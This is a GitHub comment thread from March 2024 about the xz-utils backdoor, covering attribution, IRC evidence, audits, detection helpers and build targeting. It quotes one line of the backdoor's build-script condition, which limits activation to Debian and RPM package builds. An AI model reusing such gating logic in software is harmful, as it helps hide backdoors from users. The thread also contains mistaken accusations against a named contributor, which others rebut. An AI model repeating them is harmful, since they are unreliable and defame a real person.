@herzeleid02 so far there is no active exploitation known. The installed version doesn't imply that you are truly affected - just that the version with the malicious test files and code is loaded. For the execution there are multiple requirements to be successful. Currently no one knows all, the list is just what Andres Freund found out.

We got very lucky, because the performance regression was quickly detected and the code analyzed. I doubt that logging could be bypassed with this backdoor, so looking at the logs may show you if anything relevant happened. But personally I think that nothing happened, because the cover has been blown now and if any threat actor exploited this on a large scale now, everyone would see it.

In the security world, you don't want to burn your exploits like this. Since this was planned by the involved person(s) for more than 2 years and the backdoor gradually implemented (probably to not get caught directly), there was probably some specific target (I guess not all of us) which is probably harder to hit (and so they took the long and complex route to obfuscate that as much as possible).

These are just my assumptions based on my experience in the field of cyber warfare, APTs and tactics involved in such things. The best way to hide something, is in plain sight. That also reminds me of bigger espionage cases.

Thanks a lot for the explanation. We still need to understand what's up with the payload and how systems could be affected. There was some information on how it injects an ssh auth function, but to actually exploit me you would even have to know my IP address, which sshd doesn't just advertise to the world. Journalctl seems fine, the atimes of important stuff are ok, and rpm -Va is ok too. Would they go that far?

@schkwve

schkwve commented Mar 30, 2024

How do these security audits work? I've never heard of security audits in OSS before.

@schkwve there are. For example the company Cure53 does such things. Also OpenSSL got audited multiple times: https://duckduckgo.com/?t=ffab&q=cure53+security+audit+opensource&ia=web https://duckduckgo.com/?q=openssl+security+audit&t=ffab&ia=web

Basically they read the code, run checks against the library (do some pentesting) and provide feedback based on the results.

Even the OpenSSF and Google sponsor security audits: https://duckduckgo.com/?t=ffab&q=openssf+security+audit&ia=web

If you look for more details around this, you will find more details for sure.

Thanks for the links, it's been a bit of an eye opener about OSS security :p

Security audits are more common in crypto or security related repos.

That's probably why I haven't heard of security audits that much.

@cwegener

@Z-nonymous You need to take a break from the Internet and get some fresh air.

@Exagone313

Exagone313 commented Mar 30, 2024

Exhibit from my Libera IRC logs, IP is redacted for privacy.

#ubuntu/2024-01-30.log, UTC hours

[16:13:01] *** Joins: jiatan (~jiatan@redacted)
[16:16:24] <jiatan> Hello! I could not find this information on the Ubuntu docs after a bit of searching. Does Ubuntu LTS use packages from Debian Unstable or Debian Testing?
[16:18:51] <oerheks> jiatan, Unstable
[16:20:13] <jiatan> oerheks: Thanks!

edit: fixed date above, the 31 has only:

[11:49:53] *** Parts: jiatan (~jiatan@redacted) (Leaving)
$ whois redacted-ip
netname:        M247-LTD-Singapore
descr:          M247 LTD Singapore Infrastructure

As per https://spur.us/ it's from Witopia VPN

@cwegener

from Witopia VPN

Probably just one in a gazillion of VPN providers that allows you to use the Internet from mainland China.

@yump

yump commented Mar 30, 2024

@DanielRuf

In the security world, you don't want to burn your exploits like this. Since this was planned by the involved person(s) for more than 2 years and the backdoor gradually implemented (probably to not get caught directly), there was probably some specific target (I guess not all of us) which is probably harder to hit (and so they took the long and complex route to obfuscate that as much as possible).

If the perpetrator is an intelligence agency, I think the necessary preparation makes it less likely, not more likely, that there was a specific target in mind. Given that a backdoor into sshd takes years to insert, and is a very useful capability to have, at a strategic level a good spy agency should be building such capabilities well in advance of learning what they are to be used for. When war looms you don't want to have to say, "Sorry boss, we can do that, but it'll take 2 years."

@lhmouse

lhmouse commented Mar 30, 2024

from Witopia VPN

Probably just one in a gazillion of VPN providers that allows you to use the Internet from mainland China.

I'm online on Libera and OFTC almost everyday, and no VPN is required.

If someone cares about their privacy, they can get generic user cloaks, provided by libera.chat since its migration from freenode; and there is no necessity to connect via VPN.

@DanielRuf

@yump we can't say, if this is the case. It was just some input from my point of view based on past experience. Especially when it comes to tactics. So far we don't have the full details about the backdoor.

We should concentrate on the relevant technical facts for now.

@DanielRuf

@lhmouse @cwegener the country is probably a false flag. A VPN is meant to make it look like you are from a different country.

It's not the first time I had a case where a hacker used a VPN to conceal their true country. The IP address pointed to a completely different country. So that's why we should not jump to conclusions here.

Any serious security expert does not do that. Attribution is hard and not like "look, this was the IP address, so they are in this country".

@LaRevoltage

@yump we can't say, if this is the case. It was just some input from my point of view based on past experience. Especially when it comes to tactics. So far we don't have the full details about the backdoor.

We should concentrate on the relevant technical facts for now.

The relevant technical fact is that this exploit is well beyond the information security skills of an average developer. Not only does it use a smart tactic to hide itself from commit inspection with autoconf, it also has a sophisticated payload, which we still can't reverse 16 hours after the incident.

There have been situations where devs suddenly put malicious stuff in their project for various reasons (GHSA-97m3-w2cp-4xx6), but the level of those attacks isn't comparable to this one. This is simply too good to be an exploit a normal developer wrote spontaneously.
It looks much more like a planned attack, which raises questions about third party interference.

@mrbbbaixue

from Witopia VPN
Probably just one in a gazillion of VPN providers that allows you to use the Internet from mainland China.

GitHub, Libera, and OFTC do not require a VPN.
Moreover, these VPN services were blocked in mainland China. The majority of mainland China's VPN users use self-hosted servers to connect to Hong Kong SAR.

@marsmars0x01

Exhibit from my Libera IRC logs, IP is redacted for privacy.

#ubuntu/2024-01-31.log, UTC hours

[16:13:01] *** Joins: jiatan (~jiatan@redacted)
[16:16:24] <jiatan> Hello! I could not find this information on the Ubuntu docs after a bit of searching. Does Ubuntu LTS use packages from Debian Unstable or Debian Testing?
[16:18:51] <oerheks> jiatan, Unstable
[16:20:13] <jiatan> oerheks: Thanks!
$ whois redacted-ip
netname:        M247-LTD-Singapore
descr:          M247 LTD Singapore Infrastructure

As per spur.us it's from Witopia VPN

Interesting..
Seems like our boy/girl/they/them has been watching this unfold since last night.

Might have some proof

@DanielRuf

@LaRevoltage exactly, I completely agree with you.

@xry111

xry111 commented Mar 30, 2024

This attack was possible because the release manager was a malicious user. Quite the opposite, I'm not a release manager of any project, even though I've contributed to a dozen or two, so I cannot inject malicious code stealthily (i.e. bypassing a code review) like this.

EDIT: I'm also pretty sure I've not made any PR with binary blobs.

Thus instead of (or in addition to) accusing me, you should really consider those release managers more seriously.

And how could I have known this guy was malicious when I contributed to xz? I do all my development on Linux From Scratch, where no RPMs or DEBs are used. So the malicious code was inactive and I could never have noticed it (EDIT: unless my code happened to crash on this test payload, but that didn't happen). Then did I have any valid reason not to collaborate with the reviewer? Or am I free to say "hey I don't trust this reviewer, please assign another one" in the future with no evidence?! I'd be happy to do so if I were really allowed.

I'd like a security audit of all my contributions, but I'd prefer someone to pay me some real money if they turn out clean, like I've commented in the PR.

BTW for the make-ca issue, we've been deliberately piping input data into the openssl x509 command, so the warning is just noise. There is even an OpenSSL issue complaining about it. Simply silencing it with -in /dev/stdin is better than creating a temporary file, because a temporary file would be easier for other processes running on the system to compromise than the pipe buffer. This should be really obvious. Note that make-ca is only supposed to run on Linux, so we can assume /dev/stdin is just the stdin.

@schkwve

schkwve commented Mar 30, 2024

The relevant technical fact is that this exploit is well beyond the information security skills of an average developer. Not only does it use a smart tactic to hide itself from commit inspection with autoconf, it also has a sophisticated payload, which we still can't reverse 16 hours after the incident.
This is simply too good to be an exploit a normal developer wrote spontaneously. It looks much more like a planned attack, which raises questions about third party interference.

But what now? All we can do is identify more about the backdoor, remove it, and hopefully find traces of the backdoor being used to further track down possible backdoors in other utilities.

@Exagone313

I find it strange that they used the name jiatan for asking this question. If they went to the trouble of using a VPN, they could also have used another name that doesn't have any connection to the situation. Or they could even have asked it two years ago, if it's really a scheme that spanned that long.

Though, as this is a public IRC channel, it could make Ubuntu maintainers suspicious if they find threads about updating a package connected to a Debian Unstable upgrade, from another name. Or not? You can use different nicknames on different places and it's not that strange.

@mburz

mburz commented Mar 30, 2024

Is there any IRC channel or chat room where this issue is being discussed?
I can imagine there is a lot of interest in this.

@schauveau

It seems to me that we can be optimistic that the payload is neither installing anything on the system nor calling home. Both would significantly increase the risk of being detected. A successful ssh backdoor is too valuable to risk.

Anyways, I assume that a lot of people are actively trying to analyze the payload. Does anyone know any good links showing progress?

I had a quick look at the offending object file but, at first glance, everything looks fine. The next step is probably to compare it to a genuine object file to spot the differences (e.g. which sections have different size).

@vlad-ivanov-name

vlad-ivanov-name commented Mar 30, 2024

Note that some Debian package mirrors still provide xz-utils 5.6.1, below it's dated March 27th

https://mirror.yandex.ru/debian/pool/main/x/xz-utils/

The pattern from detect_sh.bin can be found in liblzma5/usr/lib/x86_64-linux-gnu/liblzma.so.5.6.1 at address 001047f0
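For anyone who wants to repeat this kind of check on a file they have already read into memory, here is a minimal sketch of a byte-pattern search in C. The function name find_pattern is my own, and the actual signature bytes are deliberately not reproduced here; take them from the detection script rather than from this comment. The value returned is an offset into the buffer, which need not equal an address shown by a disassembler.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/*
 * Hypothetical helper (not taken from any detection script): return the
 * offset of the first occurrence of `pat` inside `buf`, or -1 if the
 * pattern does not occur. An empty pattern is treated as "not found".
 */
long find_pattern(const unsigned char *buf, size_t buf_len,
                  const unsigned char *pat, size_t pat_len)
{
    assert(buf != NULL && pat != NULL);

    if (pat_len == 0 || pat_len > buf_len)
        return -1;

    /* Naive scan: compare the pattern at every possible start offset. */
    for (size_t i = 0; i + pat_len <= buf_len; i++) {
        if (memcmp(buf + i, pat, pat_len) == 0)
            return (long)i;
    }
    return -1;
}
```

A naive scan is enough here because the library is small; a match only says the byte sequence is present, not that the backdoor is reachable on that system.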

@timrobbins1

Lasse regularly has internet breaks and is on one at the moment, started before this all kicked off. We believe CISA may be trying to get in contact with him.

I don't think it's useful to point this out, as their last commit on Github was literally Tuesday this week - plougher/squashfs-tools#276

@hardfalcon

@vlad-ivanov-name

Note that some Debian package mirrors still provide xz-utils 5.6.1, below it's dated March 27th

https://mirror.yandex.ru/debian/pool/main/x/xz-utils/

The official main mirror of the Debian project does still provide it, too:

It's possible that they simply don't have an established process for quickly removing malicious packages from their repo, and mirrors are just syncing/mirroring whatever is on the main server.

@zmej420

zmej420 commented Mar 30, 2024

Why does the gist push updating so hard when there is so much unknown? To me it sounds like the only sure shot for the moment is to reinstall with a downgraded, two-year-old xz and stop using the patched openssh. Unless you weren't affected, which most people weren't (quick check: run ldd $(which sshd) and see if liblzma is included; for me it's not, and xz --version is below 5.6 even though I'm pretty bleeding edge).
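The version half of that quick check can be sketched in C as below. It only encodes what the gist states, namely that 5.6.0 and 5.6.1 are the releases known to carry the backdoor; the function name is made up for illustration, and it expects the bare version number (for example "5.6.1"), not the full output of xz --version.

```c
#include <assert.h>
#include <stdio.h>

/*
 * Hypothetical helper: returns 1 if `version` is exactly 5.6.0 or 5.6.1
 * (the releases named in the gist), 0 for anything else, including
 * strings that do not parse as major.minor.patch.
 */
int is_backdoored_xz_version(const char *version)
{
    int major = 0, minor = 0, patch = 0;

    assert(version != NULL);

    /* sscanf returns the number of fields it managed to convert. */
    if (sscanf(version, "%d.%d.%d", &major, &minor, &patch) != 3)
        return 0;

    return major == 5 && minor == 6 && (patch == 0 || patch == 1);
}
```

A hit here does not mean the system was exploitable, since the other conditions from the gist still have to hold, and a miss says nothing about backdoors nobody has found yet.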

@LaRevoltage

The relevant technical fact is that this exploit is well beyond the information security skills of an average developer. Not only does it use a smart tactic to hide itself from commit inspection with autoconf, it also has a sophisticated payload, which we still can't reverse 16 hours after the incident.
This is simply too good to be an exploit a normal developer wrote spontaneously. It looks much more like a planned attack, which raises questions about third party interference.

But what now? All we can do is identify more about the backdoor, remove it, and hopefully find traces of the backdoor being used to further track down possible backdoors in other utilities.

That is actually the least we can do.
Patching the backdoor and checking the traces of this maintainer will help us recover from this incident. It will not help us any further. This once again alerts us to the problem with developing and maintaining big projects on the basis of free and open source principles. What we need is a new policy that will prevent such incidents, or make them less likely.

For instance, I believe that a system of checks and balances must be in place. You don't give a person write permission to the main branch, even if they have been pushing commits for 2 years, without conducting any research on their affiliations. That is by default a security concern because, even though commits are expected to be inspected, it just so happens that people tend to ignore the parts of the code they don't understand, which should never be the case. If the malicious actor had tried to push this PR to most corporate open source tools, he would have failed miserably, because no one would have let it pass without understanding the actual inner workings of the code, no matter the previous PRs. I also doubt that anyone would get write permission to the main branch of such a project without prior checks.

In my opinion, open source code under a real company is the best strategy for such critical repositories, and not a blind belief that volunteer contributors and maintainers from the community will be able to inspect and understand every commit and change, as well as determine the trustworthiness of an unknown person on the web. This closely intersects with a problem and a running joke in the open source community: that the whole of tech rests on a personal project that 2 people have been maintaining for years without any pay. This is what enables the NSA and other third parties with resources to compromise the entirety of the infrastructure, because such projects with lenient policies are the weak link of the whole system.

@mrkubax10

Is there any IRC channel or chat room where this issue is being discussed?

It would be cool.

@konimex

konimex commented Mar 30, 2024

Is there any IRC channel or chat room where this issue is being discussed? I can imagine there is a lot of interest in this.

The #tukaani channel on Libera is pretty active right now with Larhzu now active again.

Also, the incident has been acknowledged: https://tukaani.org/xz-backdoor/

@charlesgoyard

but I'd follow the advice from @erinacio and @xen0n and submit requests for audit in any number of projects you see fit

How do these security audits work? I've never heard of security audits in OSS before.

Hi, you can search for the Veracrypt security audit as an example, or read the public report.

@sommio

sommio commented Mar 30, 2024

@lhmouse @cwegener the country is probably a false flag. A VPN is meant to make it look like you are from a different country.

It's not the first time I had a case where a hacker used a VPN to conceal their true country. The IP address pointed to a completely different country. So that's why we should not jump to conclusions here.

Any serious security expert does not do that. Attribution is hard and not like "look, this was the IP address, so they are in this country".

It can only hide IP, real Singaporeans won't use this kind of host ASN to surf the net, it can't even watch Netflix. No one will believe he is a Singaporean.

@everything411

We cannot even determine whether Jia Tan is an individual person or a hacker group.

Fake name and VPN ip address cannot indicate any real information about the hacker(s) behind the account.

@paulfloyd

GNU libc isn't the only libc using ifuncs. FreeBSD libc certainly added ifuncs for str* and mem* functions recently. macOS has platform variants, but I don't know how they get resolved.

@Z-nonymous

It could be anyone: NSA, criminals, terrorists, even a highly motivated individual. Again, I want to apologize if, in pointing out the suspicious activity, I have upset some honest contributors; they may have been tricked into fixing an engineered bug that aims at validating a bad PR.

I'm glad I'm not the only one having real concerns over this. @LaRevoltage even mentioned a lot of the things I omitted to try to stick to the point.

For context: I have experience as a kernel dev for a commercial UNIX 25 years ago, but am unfortunately not familiar enough with the Linux kernel. Even in large companies, few people have knowledge both deep and wide enough to cover a whole OS. People are all specialised in one component. One can easily get tricked into fixing what is reported as a bug when in fact the problem was injected somewhere else. It's the very common case of fixing a side effect where it appears instead of where it is caused.

The Backdoor specifically targets building from the release. That targets Gentoo, LFS. xry111 is part of that LFS community. xry111 says he's not a maintainer of xz. Sure he isn't, but he can somehow commit to systemd, which is targeted by this backdoor (when ssh runs on systemd).
Removing pure from a function declaration is suspicious. A pure function is a sanity check for build-time flags, so that we know the function isn't supposed to change any variable or do IO. Now it's gone. The compiler can now make specific, more complex optimizations at build time.

Somehow xry111 removes that on the pretense that some random person mentions a bug with systemd hanging on Linux using specific versions of this and that... See associated PR systemd/systemd#27595 for issue systemd/systemd#26395.
Now systemd bus_message_type_from_string(const char *s, uint8_t *u) can be changed to modify parameters or global variables or do IO.
But somehow nobody worried, it gets bundled with other 'shenanigans', and it's in systemd for future use.... Now if we change bus_message_type_from_string(const char *s, uint8_t *u) it won't trigger sanity checks that something bad happened.

Also targeting Gentoo and LFS, then all those seemingly inoffensive LLVM changes and cmake changes to address random bugs, maybe not reproduced, just reported by someone also advising how to fix them...

I don't have much time to review all this today, there's too much. Given the sophistication needed for the actual payload to be triggered, this has to be part of a larger scheme to compromise Linux.

Somehow, using this:
https://play.clickhouse.com/play?user=play#U0VMRUNUICogRlJPTSBnaXRodWJfZXZlbnRzIFdIRVJFIGFjdG9yX2xvZ2luPSd4cnkxMTEnIE9SREVSIEJZIGZpbGVfdGltZSBERVND

we can use:
SELECT DISTINCT repo_name FROM github_events WHERE actor_login='xry111' ORDER BY file_time DESC

for all users of the community and check all their repos and how much they overlap.

I'm not saying anyone is guilty; people may be tricked/engineered into making changes by bad actors. Maybe just one bad actor, yet to be identified, is tricking people from this group; maybe just one person is a bad actor. Maybe all is fine. But the mere fact that they are touching so many core components of Linux security is of big concern.

At a quick glance at the type of changes, they are related to "adding test" (ah, this is inoffensive, right?), removing warnings, and changing things that are not even just for the Loongson architecture...

There are hundreds of repos that need to be audited now to examine this group's contributions. Even though maybe they are just tricked by false bugs.

@timtas

timtas commented Mar 30, 2024

xry

What about this Open PR tukaani-project/xz#86 with several force-push from 27 days ago?

I see the JiaT75 account working with another user account (xry111) on further CRC changes (crc changes that are currently exploited), and that user has also contributed to many core linux subsystems like openssl and systemd, protobuf-c, llvm, util-linux, torvalds/linux, make-ca, cpython... xry111 has submitted PRs and commits and is also a reviewer of PRs in many places. 16 repos contributed to this year, 47 repos in 2023, 38 in 2024.

He seems to be participating in the Loongson Chinese architecture and Linux From Scratch, though, which might explain his wide contributions, but SSL, CRC, Make, Building, Kernel, curl, libxcrypt..., that's a lot of places where he is contributing code or reviewing code. Wouldn't that allow for very sophisticated similar exploits?

I did not review all but I see some make-ca update to silence openssl warnings...

Well, I'm also contributing to Linux From Scratch and therefore "know" xry111 quite well from various conversations. While he really is terribly productive and frightfully competent in various areas, I can assure you that he certainly is not part of any conspiracy here, but a real person. I personally vouch for him that he takes no part whatsoever in this backdoor issue.

@Z-nonymous

Ifunc also they touched

@sommio

sommio commented Mar 30, 2024

from Witopia VPN

Probably just one in a gazillion of VPN providers that allows you to use the Internet from mainland China.

We don't use this kind of VPN and usually use proxy protocols designed to bypass national firewalls, in conjunction with a rule-based proxy client (e.g. sing-box, Surge).

The provider delivers it in the form of providing a proxy url and key, similar to how socks5 proxy providers are delivered.

@Z-nonymous

Well, I'm also contributing to Linux From Scratch and therefore "know" xry111 quite well from various conversations. While he really is terribly productive and frightfully competent in various areas, I can assure you that he certainly is not part of any conspiracy here, but a real person. I personally vouch for him that he takes no part whatsoever in this backdoor issue.

Thanks, I've known about the LFS community for a while; I've used Linux for 25+ years. I'm not saying there are necessarily bad actors. Are you able to understand exactly what Andres Freund disclosed in detail?
I put more details in a later post than the one you quoted in this gist.
Can you vouch for his commit on systemd and understand the implications this entails?

@duracell

duracell commented Mar 30, 2024

@Z-nonymous

It could be anyone: NSA, criminals, terrorists, even a highly motivated individual. Again, I want to apologize if, in pointing out the suspicious activity, I have upset some honest contributors; they may have been tricked into fixing an engineered bug that aims at validating a bad PR.

Or they just fixed real bugs.

I'm glad I'm not the only one having real concerns over this. @LaRevoltage even mentioned a lot of the things I omitted to try to stick to the point.

Having concerns over "this" and making wild accusations are two completely different things. It's good to get a clear picture and check every corner, but accusing somebody without ANY proof is not helpful and will get you ignored.

The Backdoor specifically targets building from the release. That targets Gentoo, LFS.

That's totally wrong. If you read the gist and/or the original post, you would learn that it targets the building of .deb and .rpm files. Neither uses these package formats. Gentoo also doesn't patch openssh with systemd-notify. So the currently known exploit path does not work on Gentoo at all.

So please, don't push against people and don't write something which is clearly wrong.

@LaRevoltage

@Z-nonymous

It could be anyone: NSA, criminals, terrorists, even a highly motivated individual. Again, I want to apologize if, in pointing out the suspicious activity, I have upset some honest contributors; they may have been tricked into fixing an engineered bug that aims at validating a bad PR.

Or they just fixed real bugs.

I'm glad I'm not the only one having real concerns over this. @LaRevoltage even mentioned a lot of the things I omitted to try to stick to the point.

Having concerns over "this" and making wild accusations are two completely different things. It's good to get a clear picture and check every corner, but accusing somebody without ANY proof is not helpful and will get you ignored.

Sorry? I didn't accuse any individual. All I did was point out that it is unlikely that such a sophisticated delivery and payload were made by a developer with regular exploitation knowledge. And that was my reply about the initial commit to xz, not the systemd one the OP is talking about.

@timtas

timtas commented Mar 30, 2024

Loongson

It could be anyone: NSA, criminals, terrorists, even a highly motivated individual. Again, I want to apologize if, in pointing out the suspicious activity, I have upset some honest contributors; they may have been tricked into fixing an engineered bug that aims at validating a bad PR.

I'm glad I'm not the only one having real concerns over this. @LaRevoltage even mentioned a lot of the things I omitted to try to stick to the point.

For context: I have experience as a kernel dev for a commercial UNIX 25 years ago, but am unfortunately not familiar enough with the Linux kernel. Even in large companies, few people have knowledge both deep and wide enough to cover a whole OS. People are all specialised in one component. One can easily get tricked into fixing what is reported as a bug when in fact the problem was injected somewhere else. It's the very common case of fixing a side effect where it appears instead of where it is caused.

The Backdoor specifically targets building from the release. That targets Gentoo, LFS. xry111 is part of that LFS community. xry111 says he's not a maintainer of xz. Sure he isn't, but he can somehow commit to systemd, which is targeted by this backdoor (when ssh runs on systemd). Removing pure from a function declaration is suspicious. A pure function is a sanity check for build-time flags, so that we know the function isn't supposed to change any variable or do IO. Now it's gone. The compiler can now make specific, more complex optimizations at build time.

Somehow xry111 removes that on the pretense that some random person mentions a bug with systemd hanging on Linux using specific versions of this and that... See associated PR systemd/systemd#27595 for issue systemd/systemd#26395. Now systemd bus_message_type_from_string(const char *s, uint8_t *u) can be changed to modify parameters or global variables or do IO. But somehow nobody worried, it gets bundled with other 'shenanigans', and it's in systemd for future use.... Now if we change bus_message_type_from_string(const char *s, uint8_t *u) it won't trigger sanity checks that something bad happened.

Also targeting Gentoo and LFS, then all those seemingly inoffensive LLVM changes and cmake changes to address random bugs, maybe not reproduced, just reported by someone also advising how to fix them...

I just looked at this systemd issue and fix, and from what I see, it was a real, reproducible hang on several (not totally random) compiler version/architecture combinations.

xry111 does contribute quite a lot to Linux From Scratch, but hardly ever creates patches on his own, and while he certainly is responsible for a lot of changes, they are all quite sensible, well-reasoned and reproducible. They also never have anything to do with this Loongson thingy. Regarding systemd, he pushed through the switch from eudev to systemd-udev, as eudev was badly maintained, and while I did not like it, I had to agree that it makes sense. He likes systemd, while I hate it, but even that, while clearly obvious, never became an issue. I'd be very, very surprised if he had anything to do with that backdoor.

@xry111

xry111 commented Mar 30, 2024

Somehow xry111 removes that on the pretense that some random person mentions a bug with systemd hanging on Linux using specific versions of this and that... See associated PR systemd/systemd#27595 for issue systemd/systemd#26395. Now systemd bus_message_type_from_string(const char *s, uint8_t *u) can be changed to modify parameters or global variables or do IO. But somehow nobody worried, it gets bundled with other 'shenanigans', and it's in systemd for future use.... Now if we change bus_message_type_from_string(const char *s, uint8_t *u) it won't trigger sanity checks that something bad happened.

What? Do you really understand what the pure attribute does?

It is an optimization attribute, not a diagnostic attribute. It means the programmer guarantees that the function does not modify global state; the compiler does not guarantee or check that.

Ideally it should be both an optimization attribute and a diagnostic attribute, but the diagnostic is not implemented yet: https://gcc.gnu.org/PR18487

So if you use the pure attribute on a non-pure function, the compiler will not emit any diagnostics and may silently generate broken code.

@Z-nonymous

That's totally wrong. If you read the gist and/or the original post, you would learn that it targets the building of .deb and .rpm files. Neither uses these package formats. Gentoo also doesn't patch openssh with systemd-notify. So the currently known exploit path does not work on Gentoo at all.

So please, don't push against people and don't write something which is clearly wrong.

Right, my comment was inaccurate.

This injects an obfuscated script to be executed at the end of configure. This
script is fairly obfuscated and data from "test" .xz files in the repository.

So that's how packages are installed if you use Gentoo or LFS, since you're building everything from source. Not sure where these "distros" get the source from; do they download releases from GitHub? A release that is specifically payloaded...

@waterkip

Somehow xry111 removes that on the pretense that some random person mentions a bug with systemd hanging on Linux using specific versions of this and that... See associated PR systemd/systemd#27595 for issue systemd/systemd#26395. Now systemd's bus_message_type_from_string(const char *s, uint8_t *u) can be changed to modify parameters or global variables or do IO. But somehow nobody worried, it gets bundled with other 'shenanigans', and it's in systemd for future use.... Now if we change bus_message_type_from_string(const char *s, uint8_t *u) it won't trigger sanity checks that something bad happened.

It seems like that random person made a lot of effort to reproduce a bug and bisect it. I don't agree with you.

@duracell

@Z-nonymous

It could be anyone, NSA, criminals, terrorists, even a highly motivated individual. Again, I want to apologize if, in pointing out suspicious activity, I may have upset some honest contributors; they may have been tricked into fixing an engineered bug that aims at validating a bad PR.

Or they just fixed real bugs.

I'm glad I'm not the only one having real concerns over this. @LaRevoltage even mentioned a lot of the things I omitted to try to stick to the point.

Having concerns over "this" and making wild accusations are two completely different things. It's good to get a clear picture and check every corner, but accusing somebody without ANY proof is not helpful and will get you ignored.

Sorry? I didn't accuse any individual; all I did was point out that it is unlikely that such a sophisticated delivery and payload were made by a developer with ordinary exploitation knowledge. And that was my reply to the initial commit to xz, not the systemd one the OP is talking about.

Sorry, it just pinged you because of the quote from Z-nonymous. I meant this person with my reply.

@Z-nonymous

Z-nonymous commented Mar 30, 2024

What? Do you really understand what the pure attribute does?

It is an optimization attribute, not a diagnostic attribute. It means the programmer guarantees that the function does not modify global state; the compiler does not guarantee or check that.

Ideally it should be both an optimization attribute and a diagnostic attribute, but the diagnostic is not implemented yet: https://gcc.gnu.org/PR18487

So if you use the pure attribute on a non-pure function, the compiler will not emit any diagnostics and may silently generate broken code.

Ooooh commercial Unix here from 25 years ago, so it was different back in my days with non-GNU compiler.

@xry111

xry111 commented Mar 30, 2024

That's totally wrong. If you read the gist and/or the original post, you would learn that it targets the building of .deb and .rpm files. Neither uses these package formats. Gentoo also doesn't patch openssh with systemd-notify. So the currently known exploit path does not work on Gentoo at all.
So please, don't push against people and don't write something which is clearly wrong.

Right, my comment was inaccurate.

This injects an obfuscated script to be executed at the end of configure. This
script is fairly obfuscated and data from "test" .xz files in the repository.

So that's how packages are installed if you use gentoo or LFS.

The obfuscated script only does things when building a .deb or .rpm package. We don't do that for LFS, so the script is basically latent.

@Z-nonymous

Z-nonymous commented Mar 30, 2024

It seems like that random person made a lot of effort to reproduce a bug and bisect it. I don't agree with you.

Thanks; I didn't know pure wasn't triggering on GNU C anyway. Not sure about code checkers some repos might have as to validate code.

@timtas

timtas commented Mar 30, 2024

That's totally wrong. If you read the gist and/or the original post, you would learn that it targets the building of .deb and .rpm files. Neither uses these package formats. Gentoo also doesn't patch openssh with systemd-notify. So the currently known exploit path does not work on Gentoo at all.
So please, don't push against people and don't write something which is clearly wrong.

Right, my comment was inaccurate.

This injects an obfuscated script to be executed at the end of configure. This
script is fairly obfuscated and data from "test" .xz files in the repository.

So that's how packages are installed if you use Gentoo or LFS, since you're building everything from source. Not sure where these "distros" get the source from; do they download releases from GitHub? A release that is specifically payloaded...

Yes, "we" (LFS) download the source directly from upstream; this can be GitHub, kernel.org or whatever. On GitHub, it is usually the created tarballs, so LFS "was" affected, but only the very early adopters of the devel version of the book, and only the systemd folks; LFS has a sysv and a systemd variant. I was not affected, as I'm still on xz 5.4.1, and on sysv.

As for how packages are installed: LFS explicitly is no distro, but a book that describes how to create a Linux system. Therefore, the book goes for:

./configure
make
make install

or the meson/ninja equivalent.

A lot of people (including me) however integrate a package manager for installation, I use my own, I doubt anyone uses dpkg or rpm.

@znkkw

znkkw commented Mar 30, 2024

From the perspective of Loongson Company, there is no reason for them to extensively modify the fundamental components of Linux merely to add a backdoor. Maybe we should just stop accusing a specific country or company, and just focus on the person who wrote this and on how to stop it.

At the end of the day, this project was maintained by one single individual, a single point of failure.

@duracell

duracell commented Mar 30, 2024

So that's how packages are installed if you use Gentoo or LFS, since you're building everything from source. Not sure where these "distros" get the source from; do they download releases from GitHub? A release that is specifically payloaded...

If you use e.g. Debian, they build it on their servers and then distribute the deb package.
I'm not sure which source they usually use, but the bad actor put a warning in that the source packages should not be used, I think to convince maintainers to use the release tarballs.

With:

  • the .deb and .rpm checks in the exploit code
  • the pushing to update to the current version on at least the Ubuntu mailing list
  • asking on IRC about the release mechanism

it's clearly the case that the main target are these deb/rpm based distributions.

So again, please be calm. It's okay to ask, but you throw so much stuff around, it's not helpful.

@xry111

xry111 commented Mar 30, 2024

That's totally wrong. If you read the gist and/or the original post, you would learn that it targets the building of .deb and .rpm files. Neither uses these package formats. Gentoo also doesn't patch openssh with systemd-notify. So the currently known exploit path does not work on Gentoo at all.
So please, don't push against people and don't write something which is clearly wrong.

Right, my comment was inaccurate.

This injects an obfuscated script to be executed at the end of configure. This
script is fairly obfuscated and data from "test" .xz files in the repository.

So that's how packages are installed if you use Gentoo or LFS, since you're building everything from source. Not sure where these "distros" get the source from; do they download releases from GitHub? A release that is specifically payloaded...

Yes, "we" (LFS) download the source directly from upstream; this can be GitHub, kernel.org or whatever. On GitHub, it is usually the created tarballs, so LFS "was" affected, but only the very early adopters of the devel version of the book, and only the systemd folks; LFS has a sysv and a systemd variant. I was not affected, as I'm still on xz 5.4.1, and on sysv.

As for how packages are installed: LFS explicitly is no distro, but a book that describes how to create a Linux system. Therefore, the book goes for:

./configure
make
make install

or the meson/ninja equivalent.

A lot of people (including me) however integrate a package manager for installation, I use my own, I doubt anyone uses dpkg or rpm.

And even on systemd we don't patch sshd for systemd notification. The instruction is here:

https://www.linuxfromscratch.org/blfs/view/systemd/postlfs/openssh.html

We just tell people to download the upstream release and build it, w/o patching.

@Z-nonymous

Z-nonymous commented Mar 30, 2024

it's clearly the case that the main target are these deb/rpm based distributions.

Well, the target is actually anyone who builds from code, so any distro that will build rpm or deb or anything, and anyone building from scratch (LFS/gentoo)
Sorry for being incorrect.

@xry111

xry111 commented Mar 30, 2024

he can somehow commit on systemd

I cannot. The PR was reviewed and merged by @yuwata.

This page even says: xry111 authored and yuwata committed on May 10, 2023.

@xry111

xry111 commented Mar 30, 2024

It seems like that random person made a lot of effort to reproduce a bug and bisect it. I don't agree with you.

Thanks; I didn't know pure wasn't triggering on GNU C anyway. Not sure about code checkers some repos might have as to validate code.

It had not (or the issue would have been found by the checker and fixed before systemd hangs on my machine). Not sure about the status quo.

@duracell

duracell commented Mar 30, 2024

it's clearly the case that the main target are these deb/rpm based distributions.

Well, the target is actually anyone who builds from code, so any distro that will build rpm or deb or anything, and anyone building from scratch (LFS/gentoo) Sorry for being incorrect.

No.
The code is:
if test -f "$srcdir/debian/rules" || test "x$RPM_ARCH" = "xx86_64";then
which is testing if you're building for a debian or rpm package!
So it's not "build rpm or deb or anything", it's "build rpm or deb", no anything.
Please, read the initial posting (or even the gist, it's also in there).

Again, if you don't know, ask questions, but don't assume things which are already known better.
Or, if you know things which are not yet in the original message or the gist, or which prove them wrong, post them.
Nearly all of your comments were wrong. Be more careful. Please!
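
To make the quoted condition concrete, here is a minimal sketch that wraps just that one test in a function so it can be tried against a scratch directory. The function name is_deb_or_rpm_build and its two arguments are made up for illustration; the real script contains further checks that are not reproduced here.

```shell
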